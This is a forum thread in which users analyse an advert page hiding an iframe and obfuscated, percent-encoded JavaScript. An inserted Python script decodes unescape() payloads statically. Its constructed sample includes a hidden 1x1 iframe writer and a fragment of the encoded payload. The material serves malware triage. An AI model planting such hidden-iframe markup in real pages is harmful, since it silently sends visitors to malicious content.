  nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL
| reply to nwrickert Re: Does anyone know anything about this advert?
Here is the iframe definition near the bottom of the eskimo.com page:
Anything obfuscated that way looks suspicious to me.
The content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the javascript (around 23000 bytes). Clearly somebody was hiding something.
I fetched those pages with "wget", so have local copies.
I later tried loading the page in XP with firefox, scripting turned on, but a limited user account. Nothing bad happened. This probably requires IE on an admin account before it can do anything bad.
Yet another reason to use a limited user account, to use firefox, to use the noscript extension.
-- AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13 |
|
  EGeezer Go Bobcats Premium join:2002-08-04 Country!
| Looks like the code in that line directs the user to the aforementioned website's directory: /dl/adv598.php
-- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... ) |
|
  nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL
| yes it does
I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread. That's quicker than trying to do it manually.
I don't currently have a good tool for handling that obfuscated javascript, though. |
|
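An added example, not part of any post in this thread: a Python sketch that inspects a saved copy of a page (such as the wget copies mentioned above) for unescape() payloads without running any script. The SAMPLE markup is constructed; only the short payload fragment and the /dl/adv598.php path come from the posts.

```python
import re

# unescape('...') or unescape("..."): capture the string literal only.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1""", re.DOTALL)
# JavaScript unescape() understands %uXXXX and %XX.
ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# Where decoded markup would send the browser.
TARGET = re.compile(r"""(?:src|href)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def js_unescape(literal):
    """Decode the way unescape() would; return (text, number_of_escapes)."""
    count = 0

    def repl(m):
        nonlocal count
        count += 1
        return chr(int(m.group(1) or m.group(2), 16))

    return ESCAPE.sub(repl, literal), count


def triage(html):
    """Statically report on every unescape() literal; nothing is executed."""
    reports = []
    for call in UNESCAPE_CALL.finditer(html):
        text, escapes = js_unescape(call.group(2))
        if not text:
            continue
        printable = sum(1 for c in text if 32 <= ord(c) < 127 or c in "\t\r\n")
        ratio = printable / len(text)
        reports.append({
            "escapes": escapes,
            "printable_ratio": round(ratio, 2),
            # Control bytes left after decoding mean a further layer remains.
            "verdict": "readable" if ratio >= 0.9 else "still-encoded",
            "targets": TARGET.findall(text) if ratio >= 0.9 else [],
        })
    return reports


# Constructed sample: an invented iframe writer, then the thread's fragment.
SAMPLE = """
<script>document.write(unescape('%3Ciframe%20src%3D%22/dl/adv598.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'));</script>
<script>var p = unescape('%19%04%3C9%0E%60wL0');</script>
"""

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

A "still-encoded" verdict means percent-decoding alone does not reveal the script, which matches the fragment quoted in the thread.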
  EGeezer Go Bobcats Premium join:2002-08-04 Country!
| I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development?
This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners: Google: reported bad
-- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... ) |
|
  nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL
| Not sure.
I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed. Other parts of eskimo.com are listed, but not the one that was used here.
I'm not seeing any warning if I try reloading the original link. |
|
  EGeezer Go Bobcats Premium join:2002-08-04 Country!
| I think I might have loaded Google's link instead - such a dummy I am!! My GET of the actual link only yielded an Apache page.
-- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... ) |
|
  newview Ex .. Ex .. Exactly Premium join:2001-10-01 Parsonsburg, MD
| reply to nwrickert
said by nwrickert: I don't currently have a good tool for handling that obfuscated javascript, though.
If you're looking for a good "de-obfuscator", Net Demon does the trick.
-- Ö¿Ö The Rules of Spam | Maryland's Newest Anti-Spam Law Where are we going? And what's with the hand basket? |
|